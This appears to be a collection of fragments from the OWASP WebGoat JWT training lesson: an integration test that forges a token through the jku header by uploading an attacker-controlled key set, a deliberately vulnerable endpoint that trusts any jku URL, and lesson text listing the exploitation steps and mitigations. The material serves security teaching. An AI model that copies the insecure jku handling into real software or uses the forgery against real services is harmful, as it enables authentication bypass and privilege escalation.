<dependency>

<groupId>com.auth0</groupId>

<artifactId>jwks-rsa</artifactId>

<version>0.22.1</version>

</dependency>

<!-- https://mvnrepository.com/artifact/com.auth0/java-jwt -->

<dependency>

<groupId>com.auth0</groupId>

<artifactId>java-jwt</artifactId>

<version>4.4.0</version>

</dependency>

<dependency>

<groupId>com.auth0</groupId>

<artifactId>jwks-rsa</artifactId>

</dependency>

<!-- https://mvnrepository.com/artifact/com.auth0/java-jwt -->

<dependency>

<groupId>com.auth0</groupId>

<artifactId>java-jwt</artifactId>

</dependency>

protected String webWolfFileUrl(String fileName) {

return webWolfUrl("/files") + "/" + getUser() + "/" + fileName;

}

import java.security.KeyPair;

import java.security.KeyPairGenerator;

import java.security.interfaces.RSAPublicKey;

import org.jose4j.jwk.JsonWebKeySet;

import org.jose4j.jwk.RsaJsonWebKey;

deleteTomThroughKidClaim();

deleteTomThroughJkuClaim();

private void deleteTomThroughKidClaim() {

.post(url("/WebGoat/JWT/kid/delete?token=" + token))

.then()

.statusCode(200)

.extract()

.path("lessonCompleted"),

CoreMatchers.is(true));

}

private void deleteTomThroughJkuClaim() throws NoSuchAlgorithmException {

KeyPairGenerator keyPairGenerator = KeyPairGenerator.getInstance("RSA");

keyPairGenerator.initialize(2048);

KeyPair keyPair = keyPairGenerator.generateKeyPair();

var jwks = new JsonWebKeySet(new RsaJsonWebKey((RSAPublicKey) keyPair.getPublic()));

RestAssured.given()

.when()

.relaxedHTTPSValidation()

.cookie("WEBWOLFSESSION", getWebWolfCookie())

.multiPart("file", "jwks.json", jwks.toJson().getBytes())

.post(webWolfUrl("/fileupload"))

.then()

.extract()

.response()

.getBody()

.asString();

Map<String, Object> header = new HashMap();

header.put(Header.TYPE, Header.JWT_TYPE);

header.put(JwsHeader.JWK_SET_URL, webWolfFileUrl("jwks.json"));

String token =

Jwts.builder()

.setHeader(header)

.setIssuer("WebGoat Token Builder")

.setAudience("webgoat.org")

.setIssuedAt(Calendar.getInstance().getTime())

.setExpiration(Date.from(Instant.now().plusSeconds(60)))

.setSubject("[email protected]")

.claim("username", "Tom")

.claim("Email", "[email protected]")

.claim("Role", new String[] {"Manager", "Project Administrator"})

.signWith(SignatureAlgorithm.RS256, keyPair.getPrivate())

.compact();

MatcherAssert.assertThat(

RestAssured.given()

.when()

.relaxedHTTPSValidation()

.cookie("JSESSIONID", getWebGoatCookie())

.post(url("/WebGoat/JWT/jku/delete?token=" + token))

package org.owasp.webgoat.lessons.jwt.claimmisuse;

import com.auth0.jwk.JwkException;

import com.auth0.jwk.JwkProvider;

import com.auth0.jwk.JwkProviderBuilder;

import com.auth0.jwt.JWT;

import com.auth0.jwt.algorithms.Algorithm;

import com.auth0.jwt.exceptions.JWTVerificationException;

import java.net.MalformedURLException;

import java.net.URL;

import java.security.interfaces.RSAPublicKey;

import org.apache.commons.lang3.StringUtils;

import org.owasp.webgoat.container.assignments.AssignmentEndpoint;

import org.owasp.webgoat.container.assignments.AssignmentHints;

import org.owasp.webgoat.container.assignments.AttackResult;

import org.springframework.web.bind.annotation.PathVariable;

import org.springframework.web.bind.annotation.PostMapping;

import org.springframework.web.bind.annotation.RequestMapping;

import org.springframework.web.bind.annotation.RequestParam;

import org.springframework.web.bind.annotation.ResponseBody;

import org.springframework.web.bind.annotation.RestController;

@RequestMapping("/JWT/jku")

@AssignmentHints({

"jwt-jku-hint1",

"jwt-jku-hint2",

"jwt-jku-hint3",

"jwt-jku-hint4",

"jwt-jku-hint5"

})

public class JWTHeaderJKUEndpoint extends AssignmentEndpoint {

@PostMapping("/follow/{user}")

public @ResponseBody String follow(@PathVariable("user") String user) {

if ("Jerry".equals(user)) {

return "Following yourself seems redundant";

} else {

return "You are now following Tom";

}

}

@PostMapping("/delete")

public @ResponseBody AttackResult resetVotes(@RequestParam("token") String token) {

if (StringUtils.isEmpty(token)) {

return failed(this).feedback("jwt-invalid-token").build();

} else {

try {

var decodedJWT = JWT.decode(token);

var jku = decodedJWT.getHeaderClaim("jku");

JwkProvider jwkProvider = new JwkProviderBuilder(new URL(jku.asString())).build();

var jwk = jwkProvider.get(decodedJWT.getKeyId());

var algorithm = Algorithm.RSA256((RSAPublicKey) jwk.getPublicKey());

JWT.require(algorithm).build().verify(decodedJWT);

String username = decodedJWT.getClaims().get("username").asString();

if ("Jerry".equals(username)) {

return failed(this).feedback("jwt-final-jerry-account").build();

}

if ("Tom".equals(username)) {

return success(this).build();

} else {

return failed(this).feedback("jwt-final-not-tom").build();

}

} catch (MalformedURLException | JWTVerificationException | JwkException e) {

return failed(this).feedback("jwt-invalid-token").output(e.toString()).build();

}

}

}

}

package org.owasp.webgoat.lessons.jwt.claimmisuse;

import org.springframework.web.bind.annotation.RequestMapping;

"jwt-kid-hint1",

"jwt-kid-hint2",

"jwt-kid-hint3",

"jwt-kid-hint4",

"jwt-kid-hint5",

"jwt-kid-hint6"

@RequestMapping("/JWT/kid")

public class JWTHeaderKIDEndpoint extends AssignmentEndpoint {

private JWTHeaderKIDEndpoint(LessonDataSource dataSource) {

@PostMapping("/follow/{user}")

@PostMapping("/delete")

JSON Web Tokens (JWTs) have gained popularity for securely transmitting information between parties. However, like any technology, they are not immune to certain vulnerabilities and attacks. Here's an overview of various JWT attacks:

This lesson will contain some common attacks, giving you an insight into what can go wrong and how you can protect yourself against them.

JWT claim misuse refers to the improper or unauthorized manipulation of the claims within a JSON Web Token (JWT). A JWT is a compact and self-contained way to represent information between two parties. It consists of the header, the payload (claims), and the signature.

JWT claim misuse can happen in different ways:

To prevent JWT claim misuse, it is essential to implement proper validation and verification mechanisms on both the client and server sides. Validate the claims to ensure they are valid, authorized, and relevant to the user's context. Additionally, always verify the signature of the JWT to ensure the token's integrity and protect against tampering. Following best practices for JWT implementation, secure key management, and regular key rotation will also help mitigate the risk of JWT claim misuse.

In the following two sections, we will dive into some examples of header claim misuses to give you an idea of how they work and how to protect an application.

Header claims misuse can occur when the header information is tampered with or manipulated inappropriately

JKU is a part of the JWT specification that allows the JWT consumer to obtain the public key needed to verify the token's signature dynamically.

It is a URL that points to a JSON Web Key Set (JWKS) endpoint, which contains the public keys used by the issuer to sign the JWTs.

An example JKU would look like this:

[source]

=== Vulnerability

JWT claim misuse with JKU The vulnerability arises when a JWT is signed with a weak or predictable key and the server provides a JKU that points to an external location hosting the public key.

Attackers can exploit this vulnerability by crafting a JWT with malicious claims and using the `jku` to trick the server into verifying the JWT using a weak or manipulated key.

It all depends on the library being used inside the application.

Some libraries block downloading from a random server by default and use a list of allowed URLs.

However, filtering on URLs is quite challenging to implement, and this can be bypassed as well.

==== Exploitation Steps:

- **Identify the JKU Endpoint**: The attacker first needs to find the JKU endpoint in the application's JWT handling logic or in any exposed configurations.

- **Generate a malicious JWT**: craft a JWT with malicious claims, altering or adding claims to gain unauthorized access or escalate privileges.

- **Sign the JWT**: Using your own private key sign the malicious JWT.

- **Send the JWT to the server**: Send the crafted JWT with the malicious claims to the server.

- **Server verification**: The server, upon receiving the JWT, validates the signature using the public key obtained from the JWKS endpoint.

- **Successful attack**: If the server uses the weak or manipulated key to verify the JWT, the attacker gains unauthorized access or executes their intended exploit.

=== Mitigation

To prevent JWT claim misuse with JKU, developers and security professionals should follow these best practices:

- **Whitelist**: utilize a whitelist to verify whether the received JKU from the token is present in the allowed list.

Be careful when comparing urls by using String comparison functions, use a whitelist instead and validate the entire url from the `jku`.

- **Static keys**: Avoid using JKU with public keys hosted on external endpoints.

Instead, use static keys that are securely managed and updated regularly.

- **Signature verification**: Ensure that the server verifies the JWT signature correctly and rejects tokens with invalid or manipulated signatures.

- **JWT validation**: Carefully validate and sanitize all JWT claims to prevent injection attacks and unauthorized access.

- **Audit and monitoring**: Regularly audit JWT usage, monitor for suspicious activity, and implement anomaly detection mechanisms.

- **Security testing**: Regularly perform security testing, including penetration testing and code reviews, to identify and remediate potential vulnerabilities.